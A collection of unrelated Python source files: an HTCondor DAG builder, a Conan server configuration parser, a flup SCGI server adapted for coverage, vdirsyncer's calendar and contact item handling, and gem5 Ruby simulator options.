        jobID += '_{:02d}'.format(len(othersubmits) + 1)
        return jobID
    def build(self):
        """Write all submit scripts and the DAG submission file."""
        # Get set of CondorExecutable and write the corresponding submit
        # scripts
        executable_set = self._get_executables()
        for executable in executable_set:
            self._make_submit_script(executable)
        # Create DAG submit file path
        dagID = self._getjobID(self)
        dag_file = '{}/submit_scripts/{}.submit'.format(
            self.condor_scratch_dir, dagID)
        self.submit_file = dag_file
        # Write dag submit file
        self.logger.info(
            'Building DAG submission file {}...'.format(self.submit_file))
        with open(dag_file, 'w') as dag:
            for job_index, job in enumerate(self, start=1):
                self.logger.info('Working on CondorJob {} [{} of {}]'.format(
                    job.name, job_index, len(self.jobs)))
                # One JOB/VARS pair per argument set of the job.
                for i, arg in enumerate(job):
                    dag.write('JOB {}_p{} '.format(job.name, i) +
                              job.condorexecutable.submit_file + '\n')
                    dag.write('VARS {}_p{} '.format(
                        job.name, i) + 'ARGS="' + arg + '"\n')
                # Add parent/child information if necessary
                if job.hasparents():
                    parent_string = 'Parent'
                    for parentjob in job.parents:
                        for j, parentarg in enumerate(parentjob):
                            parent_string += ' {}_p{}'.format(
                                parentjob.name, j)
                    child_string = 'Child'
                    for k, arg in enumerate(job):
                        child_string += ' {}_p{}'.format(job.name, k)
                    dag.write(parent_string + ' ' + child_string + '\n')
        self.logger.info('DAG submission file successfully built!')
        return
    def submit(self, maxjobs=3000, **kwargs):
        """Run ``condor_submit_dag`` on the built DAG file; extra keyword
        options are appended verbatim to the command line."""
        command = 'condor_submit_dag -maxjobs {} {}'.format(
            maxjobs, self.submit_file)
        # dict.iteritems() no longer exists on Python 3; items() works on
        # both Python 2 and 3.
        for option, value in kwargs.items():
            command += ' {} {}'.format(option, value)
        os.system(command)
        return
    def build_submit(self, maxjobs=3000, **kwargs):
        """Convenience wrapper: build() followed by submit()."""
        self.build()
        self.submit(maxjobs, **kwargs)
        return
| |
"""
Server's configuration variables
"""
import os
import random
import string
from datetime import timedelta
import six
from six.moves.configparser import ConfigParser, NoSectionError
from conans.client import tools
from conans.errors import ConanException
from conans.paths import conan_expand_user
from conans.server.conf.default_server_conf import default_server_conf
from conans.server.store.disk_adapter import ServerDiskAdapter
from conans.server.store.server_store import ServerStore
from conans.util.env_reader import get_env
from conans.util.files import mkdir, save
from conans.util.log import logger
MIN_CLIENT_COMPATIBLE_VERSION = '0.25.0'
class ConanServerConfigParser(ConfigParser):
    """ defines the configuration of the server. It can load
    values from environment variables or from file.
    Environment variables have PRECEDENCE over file values
    """
    def __init__(self, base_folder, environment=None, is_custom_path=False):
        # Fall back to the process environment exactly once (the original
        # duplicated this assignment redundantly after ConfigParser.__init__).
        environment = environment or os.environ
        ConfigParser.__init__(self)
        self.optionxform = str  # This line keeps the case of the key, important for users case
        if is_custom_path:
            self.conan_folder = base_folder
        else:
            self.conan_folder = os.path.join(base_folder, '.conan_server')
        self.config_filename = os.path.join(self.conan_folder, 'server.conf')
        self._loaded = False
        # Environment overrides; a None value means "not set, read the file".
        self.env_config = {"updown_secret": get_env("CONAN_UPDOWN_SECRET", None, environment),
                           "authorize_timeout": get_env("CONAN_AUTHORIZE_TIMEOUT", None, environment),
                           "disk_storage_path": get_env("CONAN_STORAGE_PATH", None, environment),
                           "jwt_secret": get_env("CONAN_JWT_SECRET", None, environment),
                           "jwt_expire_minutes": get_env("CONAN_JWT_EXPIRE_MINUTES", None, environment),
                           "write_permissions": [],
                           "read_permissions": [],
                           "ssl_enabled": get_env("CONAN_SSL_ENABLED", None, environment),
                           "port": get_env("CONAN_SERVER_PORT", None, environment),
                           "public_port": get_env("CONAN_SERVER_PUBLIC_PORT", None, environment),
                           "host_name": get_env("CONAN_HOST_NAME", None, environment),
                           "custom_authenticator": get_env("CONAN_CUSTOM_AUTHENTICATOR", None, environment),
                           # "user:pass,user2:pass2"
                           "users": get_env("CONAN_SERVER_USERS", None, environment)}
    def _get_file_conf(self, section, varname=None):
        """ Gets the section or variable from config file.
        If the queried element is not found an exception is raised.
        """
        try:
            # First access: write a default server.conf with random secrets.
            if not os.path.exists(self.config_filename):
                jwt_random_secret = ''.join(random.choice(string.ascii_letters) for _ in range(24))
                updown_random_secret = ''.join(random.choice(string.ascii_letters) for _ in range(24))
                server_conf = default_server_conf.format(jwt_secret=jwt_random_secret,
                                                         updown_secret=updown_random_secret)
                save(self.config_filename, server_conf)
            if not self._loaded:
                self._loaded = True
                # To avoid encoding problems we use our tools.load
                if six.PY3:
                    self.read_string(tools.load(self.config_filename))
                else:
                    self.read(self.config_filename)
            if varname:
                section = dict(self.items(section))
                return section[varname]
            else:
                return self.items(section)
        except NoSectionError:
            raise ConanException("No section '%s' found" % section)
        except Exception as exc:
            logger.debug(exc)
            raise ConanException("Invalid configuration, "
                                 "missing %s: %s" % (section, varname))
    @property
    def ssl_enabled(self):
        """True/False when configured, None when the setting is absent."""
        try:
            ssl_enabled = self._get_conf_server_string("ssl_enabled").lower()
            return ssl_enabled == "true" or ssl_enabled == "1"
        except ConanException:
            return None
    @property
    def port(self):
        """Port the server binds to (required setting)."""
        return int(self._get_conf_server_string("port"))
    @property
    def public_port(self):
        """Externally visible port; falls back to the bind port."""
        try:
            return int(self._get_conf_server_string("public_port"))
        except ConanException:
            return self.port
    @property
    def host_name(self):
        """Externally visible host name, or None when not configured."""
        try:
            return self._get_conf_server_string("host_name")
        except ConanException:
            return None
    @property
    def public_url(self):
        """Base URL clients should use; relative when no host is configured."""
        host_name = self.host_name
        ssl_enabled = self.ssl_enabled
        protocol_version = "v1"
        if host_name is None and ssl_enabled is None:
            # No hostname and ssl config means that the transfer and the
            # logical endpoint are the same and a relative URL is sufficient
            return protocol_version
        elif host_name is None or ssl_enabled is None:
            # Fixed message: the actual setting is named 'ssl_enabled'.
            raise ConanException("'host_name' and 'ssl_enabled' have to be defined together.")
        else:
            protocol = "https" if ssl_enabled else "http"
            port = ":%s" % self.public_port if self.public_port != 80 else ""
            return "%s://%s%s/%s" % (protocol, host_name, port, protocol_version)
    @property
    def disk_storage_path(self):
        """If adapter is disk, means the directory for storage"""
        try:
            disk_path = self._get_conf_server_string("disk_storage_path")
            if disk_path.startswith("."):
                disk_path = os.path.join(os.path.dirname(self.config_filename), disk_path)
                disk_path = os.path.abspath(disk_path)
            ret = conan_expand_user(disk_path)
        except ConanException:
            # If storage_path is not defined, use the current dir
            # So tests use test folder instead of user/.conan_server
            ret = os.path.dirname(self.config_filename)
        ret = os.path.normpath(ret)  # Convert to O.S paths
        mkdir(ret)
        return ret
    @property
    def read_permissions(self):
        if self.env_config["read_permissions"]:
            return self.env_config["read_permissions"]
        else:
            return self._get_file_conf("read_permissions")
    @property
    def write_permissions(self):
        if self.env_config["write_permissions"]:
            return self.env_config["write_permissions"]
        else:
            return self._get_file_conf("write_permissions")
    @property
    def custom_authenticator(self):
        """Name of a custom authenticator plugin, or None."""
        try:
            return self._get_conf_server_string("custom_authenticator")
        except ConanException:
            return None
    @property
    def users(self):
        """Mapping of user name to (ASCII-validated) password."""
        def validate_pass_encoding(password):
            try:
                password.encode('ascii')
            except (UnicodeDecodeError, UnicodeEncodeError):
                raise ConanException("Password contains invalid characters. "
                                     "Only ASCII encoding is supported")
            return password
        if self.env_config["users"]:
            pairs = self.env_config["users"].split(",")
            return {pair.split(":")[0]: validate_pass_encoding(pair.split(":")[1]) for pair in pairs}
        else:
            tmp = dict(self._get_file_conf("users"))
            tmp = {key: validate_pass_encoding(value) for key, value in tmp.items()}
            return tmp
    @property
    def jwt_secret(self):
        try:
            return self._get_conf_server_string("jwt_secret")
        except ConanException:
            raise ConanException("'jwt_secret' setting is needed. Please, write a value "
                                 "in server.conf or set CONAN_JWT_SECRET env value.")
    @property
    def updown_secret(self):
        try:
            return self._get_conf_server_string("updown_secret")
        except ConanException:
            raise ConanException("'updown_secret' setting is needed. Please, write a value "
                                 "in server.conf or set CONAN_UPDOWN_SECRET env value.")
    def _get_conf_server_string(self, keyname):
        """ Gets the value of a server config value either from the environment
        or the config file. Values from the environment have priority. If the
        value is not defined or empty an exception is raised.
        """
        if self.env_config[keyname]:
            return self.env_config[keyname]
        value = self._get_file_conf("server", keyname)
        if value == "":
            raise ConanException("no value for 'server.%s' is defined in the config file" % keyname)
        return value
    @property
    def authorize_timeout(self):
        return timedelta(seconds=int(self._get_conf_server_string("authorize_timeout")))
    @property
    def jwt_expire_time(self):
        return timedelta(minutes=float(self._get_conf_server_string("jwt_expire_minutes")))
def get_server_store(disk_storage_path, public_url, updown_auth_manager):
    """Build a ServerStore backed by a disk adapter rooted at
    *disk_storage_path*, serving files under ``<public_url>/files``."""
    disk_controller_url = "%s/%s" % (public_url, "files")
    if not updown_auth_manager:
        raise Exception("Updown auth manager needed for disk controller (not s3)")
    disk_adapter = ServerDiskAdapter(disk_controller_url,
                                     disk_storage_path,
                                     updown_auth_manager)
    return ServerStore(disk_adapter)
| |
import sys
import socket
from io import BytesIO
import logging
import select
import errno
import _thread
from flup.server.scgi import WSGIServer
from flup.server.threadedserver import ThreadedServer
from flup.server.threadpool import ThreadPool
from flup.server.scgi_base import NoDefault, Connection, Request, ProtocolError
class ThreadPoolForCoverage(ThreadPool):
    """Thread pool that can run selected jobs synchronously (useful for
    coverage measurement, which loses data in worker threads)."""
    def __init__(self, minSpare=1, maxSpare=5, maxThreads=sys.maxsize, **kw):
        super().__init__(minSpare, maxSpare, maxThreads)
        # Extra options; 'judgeThreadingRequired' maps environ -> bool.
        self.options = kw
    def addJob(self, job, allowQueuing=True):
        # Run synchronously when no threading predicate is configured, or
        # when the predicate says this request does not need a worker thread.
        # (The original nested the predicate lookup inside the key-absent
        # branch, which ran the job and then crashed with a KeyError, and it
        # never consulted the predicate when the key WAS present.)
        if "judgeThreadingRequired" not in self.options:
            job.run()
        elif not self.options["judgeThreadingRequired"](job.getEnviron()):
            job.run()
        else:
            self._lock.acquire()
            try:
                # Maintain minimum number of spares.
                while self._idleCount < self._minSpare and \
                        self._workerCount < self._maxThreads:
                    self._workerCount += 1
                    self._idleCount += 1
                    _thread.start_new_thread(self._worker, ())
                # Hand off the job.
                if self._idleCount or allowQueuing:
                    self._workQueue.append(job)
                    self._lock.notify()
                    return True
                else:
                    return False
            finally:
                self._lock.release()
def recvall(sock, length):
    """
    Attempts to receive length bytes from a socket, blocking if necessary.
    (Socket may be blocking or non-blocking.)

    Returns (data, received_length); data is ASCII-decoded to str and may be
    shorter than *length* on EOF.
    """
    dataList = []
    recvLen = 0
    while length:
        try:
            data = sock.recv(length)
        except socket.error as e:
            # e.errno replaces the Python-2-only e[0] subscripting (OSError
            # is not indexable on Python 3).
            if e.errno == errno.EAGAIN:
                select.select([sock], [], [])
                continue
            else:
                raise
        if not data:  # EOF
            break
        dataList.append(data)
        dataLen = len(data)
        recvLen += dataLen
        length -= dataLen
    return b''.join(dataList).decode("ascii"), recvLen
def readNetstring(sock):
    """
    Attempt to read a netstring ("<len>:<payload>,") from a socket and
    return the payload as str. Raises ProtocolError on malformed input and
    EOFError on truncation.
    """
    # First attempt to read the length.
    size = b""
    while True:
        try:
            c = sock.recv(1)
        except socket.error as e:
            # Same Python 3 fix as in recvall(): use e.errno, not e[0].
            if e.errno == errno.EAGAIN:
                select.select([sock], [], [])
                continue
            else:
                raise
        if c == b':':
            break
        if not c:
            raise EOFError
        size += c
    # Try to decode the length.
    try:
        size = int(size)
        if size < 0:
            raise ValueError
    except ValueError:
        raise ProtocolError('invalid netstring length')
    # Now read the string.
    s, length = recvall(sock, size)
    if length < size:
        raise EOFError
    # Lastly, the trailer.
    trailer, length = recvall(sock, 1)
    if length < 1:
        raise EOFError
    if trailer != ',':
        raise ProtocolError('invalid netstring trailer')
    return s
class ConnectionForCoverage(Connection):
    """SCGI connection that caches the request headers so the environ can be
    inspected (getEnviron) before the request is dispatched."""
    def __init__(self, sock, addr, server):
        super().__init__(sock, addr, server)
        # Cached raw netstring header block; read at most once per request.
        self._headers = None
    def readHeaders(self):
        # Identity comparison with None (was ``== None``).
        if self._headers is None:
            self._headers = readNetstring(self._sock)
        return self._headers
    def getEnviron(self):
        """Parse the cached SCGI headers into an environ-style dict."""
        headers = self.readHeaders()
        headers = headers.split('\x00')[:-1]
        if len(headers) % 2 != 0:
            raise ProtocolError('invalid headers')
        environ = {}
        for i in range(int(len(headers) / 2)):
            environ[headers[2 * i]] = headers[2 * i + 1]
        return environ
    def processInput(self):
        # The header parsing was duplicated inline here; reuse getEnviron()
        # so the two code paths cannot diverge (readHeaders caches the raw
        # block, so no extra socket read occurs).
        environ = self.getEnviron()
        clen = environ.get('CONTENT_LENGTH')
        if clen is None:
            raise ProtocolError('missing CONTENT_LENGTH')
        try:
            clen = int(clen)
            if clen < 0:
                raise ValueError
        except ValueError:
            raise ProtocolError('invalid CONTENT_LENGTH')
        self._sock.setblocking(1)
        if clen:
            input = self._sock.makefile('rb')
        else:
            # Empty input.
            input = BytesIO()
        # stdout
        output = self._sock.makefile('wb')
        # Allocate Request
        req = Request(self, environ, input, output)
        # Run it.
        req.run()
        output.close()
        input.close()
class ThreadedServerForCoverage(ThreadedServer):
    # Overrides __init__ solely to substitute ThreadPoolForCoverage for the
    # stock flup thread pool.
    # NOTE(review): ThreadedServer.__init__ is deliberately not called, so
    # any additional state it would initialise is absent -- presumably safe
    # for this coverage use case; verify against the flup version in use.
    def __init__(self, jobClass=None, jobArgs=(), **kw):
        self._jobClass = jobClass
        self._jobArgs = jobArgs
        self._threadPool = ThreadPoolForCoverage(**kw)
class WSGIServerForCoverage(WSGIServer, ThreadedServerForCoverage):
    """flup WSGIServer wired to the coverage-friendly threaded server and
    connection classes."""
    def __init__(self, application, scriptName=NoDefault, environ=None,
                 multithreaded=True, multiprocess=False,
                 bindAddress=('localhost', 4000), umask=None,
                 allowedServers=None,
                 loggingLevel=logging.INFO, debug=True, **kw):
        WSGIServer.__init__(self, application,
                            scriptName=scriptName,
                            environ=environ,
                            multithreaded=multithreaded,
                            multiprocess=multiprocess,
                            bindAddress=bindAddress,
                            umask=umask,
                            allowedServers=allowedServers,
                            loggingLevel=loggingLevel,
                            debug=debug)
        # Strip options WSGIServer already consumed before re-initialising
        # the threaded server with our Connection subclass.
        for key in ('jobClass', 'jobArgs'):
            if key in kw:
                del kw[key]
        ThreadedServerForCoverage.__init__(self, jobClass=ConnectionForCoverage, jobArgs=(self,),
                                           **kw)
    def run(self):
        """Bind the socket and run the server loop; returns the loop's
        result (False if the socket could not be bound)."""
        self.logger.info('%s starting up', self.__class__.__name__)
        try:
            sock = self._setupSocket()
        except socket.error as e:
            # e.strerror replaces the Python-2-only e[1] subscripting.
            self.logger.error('Failed to bind socket (%s), exiting', e.strerror)
            return False
        ret = ThreadedServerForCoverage.run(self, sock)
        self._cleanupSocket(sock)
        self.logger.info('%s shutting down%s', self.__class__.__name__,
                         self._hupReceived and ' (reload requested)' or '')
        return ret
    def handler(self, request):
        """
        WSGI handler. Sets up WSGI environment, calls the application,
        and sends the application's response.
        """
        environ = request.environ
        environ.update(self.environ)
        environ['wsgi.version'] = (1, 0)
        environ['wsgi.input'] = request.stdin
        environ['wsgi.errors'] = sys.stderr
        environ['wsgi.multithread'] = self.multithreaded
        environ['wsgi.multiprocess'] = self.multiprocess
        environ['wsgi.run_once'] = False
        if environ.get('HTTPS', 'off') in ('on', '1'):
            environ['wsgi.url_scheme'] = 'https'
        else:
            environ['wsgi.url_scheme'] = 'http'
        self._sanitizeEnv(environ)
        headers_set = []
        headers_sent = []
        result = None
        def write(data):
            # Accept str for convenience; the wire wants bytes.
            if type(data) is str:
                data = data.encode("utf8")
            #assert type(data) is str, 'write() argument must be string'
            assert headers_set, 'write() before start_response()'
            if not headers_sent:
                status, responseHeaders = headers_sent[:] = headers_set
                found = False
                for header, value in responseHeaders:
                    if header.lower() == 'content-length':
                        found = True
                        break
                # Single-chunk responses get an automatic Content-Length.
                if not found and result is not None:
                    try:
                        if len(result) == 1:
                            responseHeaders.append(('Content-Length',
                                                    str(len(data))))
                    except:
                        pass
                s = 'Status: %s\r\n' % status
                for header in responseHeaders:
                    s += '%s: %s\r\n' % header
                s += '\r\n'
                request.stdout.write(s.encode("utf8"))
            request.stdout.write(data)
            request.stdout.flush()
        def start_response(status, response_headers, exc_info=None):
            if exc_info:
                try:
                    if headers_sent:
                        # Re-raise if too late
                        raise exc_info[0](exc_info[1]).with_traceback(exc_info[2])
                finally:
                    exc_info = None  # avoid dangling circular ref
            else:
                assert not headers_set, 'Headers already set!'
            assert type(status) is str, 'Status must be a string'
            assert len(status) >= 4, 'Status must be at least 4 characters'
            assert int(status[:3]), 'Status must begin with 3-digit code'
            assert status[3] == ' ', 'Status must have a space after code'
            assert type(response_headers) is list, 'Headers must be a list'
            if __debug__:
                for name, val in response_headers:
                    assert type(name) is str, 'Header name "%s" must be a string' % name
                    assert type(val) is str, 'Value of header "%s" must be a string' % name
            headers_set[:] = [status, response_headers]
            return write
        if not self.multithreaded:
            self._appLock.acquire()
        try:
            try:
                result = self.application(environ, start_response)
                try:
                    for data in result:
                        if data:
                            write(data)
                    if not headers_sent:
                        write(b'')  # in case body was empty
                finally:
                    if hasattr(result, 'close'):
                        result.close()
            except socket.error as e:
                # e.errno replaces the Python-2-only e[0] subscripting.
                if e.errno != errno.EPIPE:
                    raise  # Don't let EPIPE propagate beyond server
        finally:
            if not self.multithreaded:
                self._appLock.release()
| |
# -*- coding: utf-8 -*-
import hashlib
from itertools import chain, tee
from . import cached_property, uniq
# Property names stripped before items are normalized for comparison and
# hashing -- these change without the item's meaningful content changing.
IGNORE_PROPS = (
    # PRODID is changed by radicale for some reason after upload
    'PRODID',
    # X-RADICALE-NAME is used by radicale, because hrefs don't really exist in
    # their filesystem backend
    'X-RADICALE-NAME',
    # Apparently this is set by Horde?
    # https://github.com/pimutils/vdirsyncer/issues/318
    'X-WR-CALNAME',
    # Those are from the VCARD specification and is supposed to change when the
    # item does -- however, we can determine that ourselves
    'REV',
    'LAST-MODIFIED',
    'CREATED',
    # Some iCalendar HTTP calendars generate the DTSTAMP at request time, so
    # this property always changes when the rest of the item didn't. Some do
    # the same with the UID.
    #
    # - Google's read-only calendar links
    # - http://www.feiertage-oesterreich.at/
    'DTSTAMP',
    'UID',
)
class Item(object):
    '''Immutable wrapper class for VCALENDAR (VEVENT, VTODO) and
    VCARD'''
    def __init__(self, raw):
        # Store raw text only; parsing is deferred until a property needs it.
        assert isinstance(raw, str)
        self._raw = raw
    def with_uid(self, new_uid):
        # Return a copy whose UID property is replaced in every item-level
        # component (or removed entirely when ``new_uid`` is falsy).
        parsed = _Component.parse(self.raw)
        stack = [parsed]
        while stack:
            component = stack.pop()
            stack.extend(component.subcomponents)
            if component.name in ('VEVENT', 'VTODO', 'VJOURNAL', 'VCARD'):
                del component['UID']
                if new_uid:
                    component['UID'] = new_uid
        return Item('\r\n'.join(parsed.dump_lines()))
    @cached_property
    def raw(self):
        '''Raw content of the item, as unicode string.
        Vdirsyncer doesn't validate the content in any way.
        '''
        return self._raw
    @cached_property
    def uid(self):
        '''Global identifier of the item, across storages, doesn't change after
        a modification of the item.'''
        # Don't actually parse component, but treat all lines as single
        # component, avoiding traversal through all subcomponents.
        x = _Component('TEMP', self.raw.splitlines(), [])
        try:
            return x['UID'].strip() or None
        except KeyError:
            return None
    @cached_property
    def hash(self):
        '''Hash of self.raw, used for etags.'''
        return hash_item(self.raw)
    @cached_property
    def ident(self):
        '''Used for generating hrefs and matching up items during
        synchronization. This is either the UID or the hash of the item's
        content.'''
        # We hash the item instead of directly using its raw content, because
        #
        # 1. The raw content might be really large, e.g. when its a contact
        #    with a picture, which bloats the status file.
        #
        # 2. The status file would contain really sensitive information.
        return self.uid or self.hash
    @property
    def parsed(self):
        '''Don't cache because the rv is mutable.'''
        try:
            return _Component.parse(self.raw)
        except Exception:
            return None
def normalize_item(item, ignore_props=IGNORE_PROPS):
    '''Create syntactically invalid mess that is equal for similar items.

    :param ignore_props: iterable of property names stripped before
        comparison (defaults to IGNORE_PROPS).
    '''
    if not isinstance(item, Item):
        item = Item(item)
    # Treat all lines as one flat component; full parsing is unnecessary here.
    x = _Component('TEMP', item.raw.splitlines(), [])
    # Fix: honour the ``ignore_props`` argument -- the original iterated the
    # module-level IGNORE_PROPS constant, silently ignoring the parameter.
    for prop in ignore_props:
        del x[prop]
    x.props.sort()
    return u'\r\n'.join(filter(bool, (line.strip() for line in x.props)))
def hash_item(text):
    '''Return the SHA-256 hex digest of the normalized item (used for
    etags).'''
    return hashlib.sha256(normalize_item(text).encode('utf-8')).hexdigest()
def split_collection(text):
    '''Split a combined VCALENDAR/VADDRESSBOOK file into one serialized
    item per UID; shared VTIMEZONE components are copied into every item.'''
    assert isinstance(text, str)
    inline = []  # components (timezones) shared by every emitted item
    items = {}  # uid => item
    ungrouped_items = []  # items without a usable UID
    for main in _Component.parse(text, multiple=True):
        _split_collection_impl(main, main, inline, items, ungrouped_items)
    for item in chain(items.values(), ungrouped_items):
        item.subcomponents.extend(inline)
        yield u'\r\n'.join(item.dump_lines())
def _split_collection_impl(item, main, inline, items, ungrouped_items):
    # Recursive worker: sort each component into the shared-inline list,
    # the per-UID map, or the ungrouped list. ``main`` is the outermost
    # wrapper whose name/props are cloned around each split-out item.
    if item.name == u'VTIMEZONE':
        inline.append(item)
    elif item.name == u'VCARD':
        ungrouped_items.append(item)
    elif item.name in (u'VTODO', u'VEVENT', u'VJOURNAL'):
        uid = item.get(u'UID', u'')
        # Wrap the item in a copy of the main component's envelope so each
        # emitted item is a standalone VCALENDAR.
        wrapper = _Component(main.name, main.props[:], [])
        if uid.strip():
            # Components sharing a UID (e.g. recurrence exceptions) are
            # grouped into the same wrapper.
            wrapper = items.setdefault(uid, wrapper)
        else:
            ungrouped_items.append(wrapper)
        wrapper.subcomponents.append(item)
    elif item.name in (u'VCALENDAR', u'VADDRESSBOOK'):
        for subitem in item.subcomponents:
            _split_collection_impl(subitem, item, inline, items,
                                   ungrouped_items)
    else:
        raise ValueError('Unknown component: {}'
                         .format(item.name))
_default_join_wrappers = {
u'VCALENDAR': u'VCALENDAR',
u'VEVENT': u'VCALENDAR',
u'VTODO': u'VCALENDAR',
u'VCARD': u'VADDRESSBOOK'
}
def join_collection(items, wrappers=_default_join_wrappers):
    '''
    Join multiple raw item strings into one collection file.

    :param items: iterable of raw item strings.
    :param wrappers: {
        item_type: wrapper_type
    }
    '''
    # Two passes over the same parsed stream: one to sniff the item type,
    # one to gather the components themselves.
    items1, items2 = tee((_Component.parse(x)
                          for x in items), 2)
    item_type, wrapper_type = _get_item_type(items1, wrappers)
    wrapper_props = []

    def _get_item_components(x):
        # If an item already carries the wrapper (e.g. a full VCALENDAR),
        # unwrap it and remember its props for the shared outer wrapper.
        if x.name == wrapper_type:
            wrapper_props.extend(x.props)
            return x.subcomponents
        else:
            return [x]

    # NOTE: the star-unpacking below consumes the generator eagerly, so
    # wrapper_props is fully populated before it is read further down.
    components = chain(*(_get_item_components(x) for x in items2))
    # De-duplicate whole components by their dumped line tuples.
    lines = chain(*uniq(tuple(x.dump_lines()) for x in components))

    if wrapper_type is not None:
        lines = chain(*(
            [u'BEGIN:{}'.format(wrapper_type)],
            # XXX: wrapper_props is a list of lines (with line-wrapping), so
            # filtering out duplicate lines will almost certainly break
            # multiline-values. Since the only props we usually need to
            # support are PRODID and VERSION, I don't care.
            uniq(wrapper_props),
            lines,
            [u'END:{}'.format(wrapper_type)]
        ))
    return u''.join(line + u'\r\n' for line in lines)
def _get_item_type(components, wrappers):
i = 0
for component in components:
i += 1
try:
item_type = component.name
wrapper_type = wrappers[item_type]
except KeyError:
pass
else:
return item_type, wrapper_type
if not i:
return None, None
else:
raise ValueError('Not sure how to join components.')
class _Component(object):
'''
Raw outline of the components.
Vdirsyncer's operations on iCalendar and VCard objects are limited to
retrieving the UID and splitting larger files into items. Consequently this
parser is very lazy, with the downside that manipulation of item properties
are extremely costly.
Other features:
- Preserve the original property order and wrapping.
- Don't choke on irrelevant details like invalid datetime formats.
Original version from https://github.com/collective/icalendar/, but apart
from the similar API, very few parts have been reused.
'''
def __init__(self, name, lines, subcomponents):
'''
:param name: The component name.
:param lines: The component's own properties, as list of lines
(strings).
:param subcomponents: List of components.
'''
self.name = name
self.props = lines
self.subcomponents = subcomponents
@classmethod
def parse(cls, lines, multiple=False):
if isinstance(lines, bytes):
lines = lines.decode('utf-8')
if isinstance(lines, str):
lines = lines.splitlines()
stack = []
rv = []
try:
for _i, line in enumerate(lines):
if line.startswith(u'BEGIN:'):
c_name = line[len(u'BEGIN:'):].strip().upper()
stack.append(cls(c_name, [], []))
elif line.startswith(u'END:'):
component = stack.pop()
if stack:
stack[-1].subcomponents.append(component)
else:
rv.append(component)
else:
if line.strip():
stack[-1].props.append(line)
except IndexError:
raise ValueError('Parsing error at line {}'.format(_i + 1))
if multiple:
return rv
elif len(rv) != 1:
raise ValueError('Found {} components, expected one.'
.format(len(rv)))
else:
return rv[0]
def dump_lines(self):
yield u'BEGIN:{}'.format(self.name)
for line in self.props:
yield line
for c in self.subcomponents:
for line in c.dump_lines():
yield line
yield u'END:{}'.format(self.name)
def __delitem__(self, key):
prefix = (u'{}:'.format(key), u'{};'.format(key))
new_lines = []
lineiter = iter(self.props)
while True:
for line in lineiter:
if line.startswith(prefix):
break
else:
new_lines.append(line)
else:
break
for line in lineiter:
if not line.startswith((u' ', u'\t')):
new_lines.append(line)
break
self.props = new_lines
def __setitem__(self, key, val):
assert isinstance(val, str)
assert u'\n' not in val
del self[key]
line = u'{}:{}'.format(key, val)
self.props.append(line)
def __contains__(self, obj):
if isinstance(obj, type(self)):
return obj not in self.subcomponents and \
not any(obj in x for x in self.subcomponents)
elif isinstance(obj, str):
return self.get(obj, None) is not None
else:
raise ValueError(obj)
def __getitem__(self, key):
prefix_without_params = '{}:'.format(key)
prefix_with_params = '{};'.format(key)
iterlines = iter(self.props)
for line in iterlines:
if line.startswith(prefix_without_params):
rv = line[len(prefix_without_params):]
break
elif line.startswith(prefix_with_params):
rv = line[len(prefix_with_params):].split(':', 1)[-1]
break
else:
raise KeyError()
for line in iterlines:
if line.startswith((u' ', u'\t')):
rv += line[1:]
else:
break
return rv
def get(self, key, default=None):
try:
return self[key]
except KeyError:
return default
def __eq__(self, other):
return (
isinstance(other, type(self)) and
self.name == other.name and
self.props == other.props and
self.subcomponents == other.subcomponents
)
| |
# Copyright (c) 2012 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Copyright (c) 2006-2007 The Regents of The University of Michigan
# Copyright (c) 2009 Advanced Micro Devices, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Brad Beckmann
import math
import m5
from m5.objects import *
from m5.defines import buildEnv
def define_options(parser):
    """Register Ruby-specific command line options on *parser*, then let
    the compiled-in coherence protocol module add its own options."""
    # By default, ruby uses the simple timing cpu
    parser.set_defaults(cpu_type="timing")

    # ruby network options
    parser.add_option("--topology", type="string", default="Crossbar",
                      help="check src/mem/ruby/network/topologies for complete set")
    parser.add_option("--mesh-rows", type="int", default=1,
                      help="the number of rows in the mesh topology")
    parser.add_option("--garnet-network", type="string", default=None,
                      help="'fixed'|'flexible'")
    parser.add_option("--network-fault-model", action="store_true", default=False,
                      help="enable network fault model: see src/mem/ruby/network/fault_model/")

    # ruby mapping options
    parser.add_option("--numa-high-bit", type="int", default=0,
                      help="high order address bit to use for numa mapping. " \
                           "0 = highest bit, not specified = lowest bit")

    # ruby sparse memory options
    parser.add_option("--use-map", action="store_true", default=False)
    parser.add_option("--map-levels", type="int", default=4)

    parser.add_option("--recycle-latency", type="int", default=10,
                      help="Recycle latency for ruby controller input buffers")
    parser.add_option("--random_seed", type="int", default=1234,
                      help="Used for seeding the random number generator")
    parser.add_option("--ruby_stats", type="string", default="ruby.stats")

    # Import the protocol package selected at build time and let it add
    # protocol-specific options (exec/eval on a build-time constant, not
    # on user input).
    protocol = buildEnv['PROTOCOL']
    exec "import %s" % protocol
    eval("%s.define_options(parser)" % protocol)
